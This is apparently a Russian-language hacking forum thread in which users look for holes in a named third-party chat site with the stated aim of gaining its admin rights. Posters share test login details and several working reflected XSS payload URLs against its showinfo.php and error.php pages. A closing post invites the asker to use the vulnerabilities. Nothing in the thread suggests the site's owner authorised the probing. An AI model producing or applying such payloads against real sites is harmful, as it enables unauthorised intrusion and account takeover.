|
Новый чат
Вот гулял по просторам инета и набрел вот на этот сайт http://sin-lab.net.ru
Они типа чат делают какой-то. Так вот суть вопроса, у них типа пример чата расположен по адресу http://chat.ordenvlasti.ru/ Есть ли в нем дыры и можно ли получить права админа в нем? |
Щас проверим..
PS для тех кто будет ковыряться: Ник: tester Пасс: 123456 |
Вот вам XSS
Код:
http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cscript%3Ealert(123456)%3C/script%3E |
EST a1ien, Нет здесь xss, алерт не выпадает.. С чего ты взял что она там?
|
Цитата:
при вставке в адресную строку открывается пустая страница :( |
Через сообщения (Пм) ничего не получается, т.к. у каждого сообщения свой id..
В поисковике всё тоже пофиксено.. EST a1ien, нету там xss ещё раз говорю.. Я пробовал, там всё фильтруется.. Хватит писать не по теме, хочешь что то маленькое добавить, отредактируй тот пост... |
Код:
http://chat.ordenvlasti.ru/showinfo.php?nick=<script>alert(123456)</script>Чтобы вылетел алерт надо зайти в чат. |
Расшарил xss в поисковике: Для выпада алерта, нужен вход в чат
_http://chat.ordenvlasti.ru/showinfo.php?nick=%3Cimage+style%3Dbackground%3Aur l%28javascript%3Aalert%28%2FSLIP%2F%29%29%3E ============ Ещё одна: Вход в чат необязателен _http://chat.ordenvlasti.ru/error.php?msg=Пароль%20не%20верный!" ><image%20style=background:url(javascript:alert(/SLIP/))> ============ На главной странице, при просмотре анкеты админа.. Хоть и пишит что ник не зареген. но алерт то вылазит) Вход в сам чат необязателен _http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><image%20style=backgroun d:url(javascript:alert(/SLIP/))> Или так: _http://chat.ordenvlasti.ru/showinfo.php?nick=DarkAG"><script>alert(/SLIP/)</script> |
Короче в этом посте я буду писать все найденные баги
1) Цитата:
|
Chaos-zone, тебе выложили уязвимости.. пользуйся)
|
| Время: 13:41 |